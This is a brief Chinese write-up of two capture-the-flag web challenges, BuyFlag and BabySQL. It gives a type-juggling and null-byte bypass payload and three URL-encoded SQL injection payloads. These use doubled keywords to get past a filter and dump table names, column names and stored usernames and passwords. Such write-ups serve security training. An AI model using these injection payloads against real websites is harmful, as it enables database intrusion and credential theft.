2.8 [极客大挑战 2019]BuyFlag&BabySQL

BuyFlag

查看网页源代码找到一处php代码:

抓包查看:将user=1

然后绕过is_numeric函数,通过%00截断绕过。

然后需要money字段,用到数组绕过。

payload:

1
password=404%00&money[]=100000000


BabySQL

通过分析发现过滤了:and,or,union,select等关键字,但是可以双写绕过,有可显字段,使用普通的sql注入语句加上双写关键字即可完成注入。



使用的payload:

1
2
3
4
5
6
7
8
查询表名
admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23

查询字段名
admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23

查询字段内容
username=admin&password=admi' uniunionon selselectect 1,group_concat(concat_ws(':',username,passwoorrd)),3 frofromm b4bsql --+

#
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×